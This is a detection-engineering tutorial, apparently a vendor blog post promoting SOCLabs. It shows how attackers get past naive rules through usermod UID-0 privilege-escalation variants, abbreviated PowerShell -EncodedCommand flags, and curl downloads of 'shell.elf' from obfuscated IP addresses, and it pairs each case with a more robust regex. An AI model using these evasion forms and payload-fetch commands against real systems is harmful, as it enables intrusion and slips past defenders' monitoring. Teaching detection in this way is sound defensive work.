How to Write Threat Detection Rules That Actually Work

In a modern security defense stack, Detection Engineering is a critical capability. For many new security analysts, writing detection rules can look deceptively simple: “Isn’t it just a few regexes and keyword matches?”

Once you dig in, you’ll realize full of bypassable assumptions. A rule that looks perfect can break completely if an attacker changes the parameter order, uses an abbreviation, or even adds a single space.

In real-world adversarial scenarios, this kind of `string-based` detection is extremely fragile. Attackers take full advantage of the flexibility built into operating systems and tools to generate payloads that behave the same but look different—easily bypassing static rules. A competent detection engineer needs a deep understanding of attacker techniques, and must balance two goals at once: reliably cover variants while keeping false positives low for legitimate activity.

This article walks through several practical examples to highlight common traps in detection rule writing and how to build more robust detection logic.

1. Parameter Order and Format Diversity

In Linux persistence scenarios, an attacker can use `usermod` to change a normal user’s UID to 0. Since UID 0 identifies the root account, the modified user effectively gains full root privileges—while still appearing as a normal username. This stealthy privilege escalation is easy to miss during routine admin checks.

Example attack command:

usermod -u 0 -o testuser

A common beginner approach is to match the command string directly:

process_name = "usermod" AND command_line CONTAINS "-u 0 -o"

This looks reasonable, but it has major blind spots. With minimal knowledge of `usermod`, you’ll notice many equivalent variants achieve the same result while bypassing the rule:

# 1: Swap parameter order
usermod -o -u 0 testuser

# 2: Use long options
usermod --uid 0 --non-unique testuser

# 3: Mix long and short options
usermod --uid 0 -o testuser

# 4: Use equals assignment
usermod -o --uid=0 testuser

# 5: No space between -u and 0
usermod -u0 -o testuser 

# 6: Move the username position
usermod testuser -u 0 -o
                    

Linux argument parsing (e.g., `getopt`) typically supports order-independent options, long/short equivalence (`-u` vs `--uid`), multiple assignment formats (space or `=`), and compact forms like `-u0`. In other words, one command can have dozens of valid spellings. Simple string matching will inevitably miss cases.

A better approach is to target the invariant core of the behavior. No matter how the attacker rewrites it, this privilege escalation must include three elements: the `usermod` binary, a UID option (`-u` or `--uid`), and the value `0`. With that, a single regex can cover the major variants:

process_name = "usermod" 
AND command_line REGEX "(-u\s*0\b|--uid[=\s]+0\b)"

This regex matches either `-u` followed by `0` (with optional whitespace) or `--uid` followed by `0` via space or `=`. Because regex is pattern-based rather than position-based, it will match regardless of where the option appears in the command line—naturally addressing parameter order issues.

2. Parameter Variants and Aliases

On Windows, PowerShell is both an attacker favorite and a defender’s headache. To hide malicious code, attackers often execute commands via Base64.

The most standard form is: `powershell.exe -EncodedCommand <Base64String>`

A beginner rule often looks like this:

process_name = "powershell.exe" AND command_line CONTAINS "-EncodedCommand"

That’s far from sufficient. PowerShell is intentionally flexible: parameters support prefix matching (any unique prefix works), are case-insensitive, and accept either `-` or `/` as the option prefix. As a result, `-EncodedCommand` can be shortened to many equivalent forms, all valid:

powershell -EncodedCommand SQBFAFgA...   # full parameter
powershell -EncodedComman SQBFAFgA...    # minus 1 letter
powershell -EncodedComma SQBFAFgA...     # minus 2 letters
powershell -EncodedComm SQBFAFgA...      # minus 3 letters
powershell -EncodedCom SQBFAFgA...       # minus 4 letters
powershell -EncodedCo SQBFAFgA...        # minus 5 letters
powershell -EncodedC SQBFAFgA...         # minus 6 letters
powershell -Encoded SQBFAFgA...          # minus 7 letters
powershell -Encode SQBFAFgA...           # minus 8 letters
powershell -Encod SQBFAFgA...            # minus 9 letters
powershell -Enco SQBFAFgA...             # minus 10 letters
powershell -Enc SQBFAFgA...              # minus 11 letters
powershell -En SQBFAFgA...               # minus 12 letters
powershell -E SQBFAFgA...                # shortest form
powershell /enc SQBFAFgA...              # slash prefix
powershell -ec SQBFAFgA...               # “skipping” abbreviation
                    

To cover these variants, the rule should match multiple executable names and use regex to handle the full range of option spellings:

process_name REGEX "(?i)(powershell|pwsh)(\.exe)?$"
AND command_line REGEX "(?i)[\s][-/](e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)[\s]"
                    

This regex enumerates valid prefixes from the shortest form to the full parameter name. `(?i)` enforces case-insensitive matching, and `[-/]` matches both `-` and `/`.

3. Data Encoding and Equivalent Representations

In many environments, legitimate services are typically accessed via domain names. Directly requesting an IP address can be suspicious. Suppose your detection team wants to flag `curl` requests that target an IP address rather than a domain. A beginner might write:

process_name = "curl"
AND command_line REGEX "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
                    

This matches standard dotted-decimal IP addresses and seems reasonable. The issue is that operating systems support multiple equivalent IP representations. All of the following can reach `192.168.1.100`, but none match dotted-decimal:

# Standard dotted decimal (will be detected)
curl http://192.168.1.100/shell.elf

# Hex format
curl http://0xC0.0xA8.0x1.0x64/shell.elf

# Octal format
curl http://0300.0250.01.0144/shell.elf

# Decimal integer format
curl http://3232235876/shell.elf

# Mixed-base format
curl http://0xC0.168.0x1.100/shell.elf

# Omit middle octets (example uses 10.0.0.1)
curl http://10.1/shell.elf
                    

To a human, these don’t look like IP addresses at all, but the OS networking stack can parse them and connect correctly. A rule that only covers dotted-decimal will fail against these variants.

Exhaustively capturing every representation with regex is close to impossible. Instead, change the strategy: if the goal is to detect “using an IP instead of a domain,” think in reverse—match all `curl` requests, then exclude those whose targets match normal domain-name patterns. What remains are the potentially suspicious cases. This “exclude normal” approach often scales better than trying to enumerate every “abnormal” encoding trick.

Summary

Across these three examples, the same challenge keeps showing up: the flexibility that operating systems and tools provide for usability becomes an attacker’s bypass mechanism. Options can be reordered, shortened, or expressed in different formats—equivalent to the program, but completely different strings to a text-matching rule.

To write robust detection rules, focus on three principles: (1) capture the invariant behavior, not a single literal spelling; (2) use regex for pattern matching to cover known variants; (3) when enumeration is impractical, consider a reverse strategy—exclude normal rather than exhaustively listing abnormal.

Still, there’s always a gap between theory and real-world effectiveness. After you write a rule, how do you validate that it covers enough bypass variants? And how do you ensure it won’t generate noisy false positives in production? These questions are hard to answer with reasoning alone.

That’s why we built the SOCLabs platform. SOCLabs focuses on threat detection learning and hands-on training. Each detection challenge includes a large set of realistic bypass techniques and obfuscated variants to evaluate how resilient your rules really are. The platform also includes extensive benign “background noise” data—drawn from real-world cases by experienced detection engineers—to help you improve detection coverage while keeping false positives under control.

Detection engineering has no one-time silver bullet. It’s a continuous adversarial game. If you want to sharpen your detection skills in realistic scenarios, visit SOCLabs and grow into a stronger detection engineer through hands-on practice.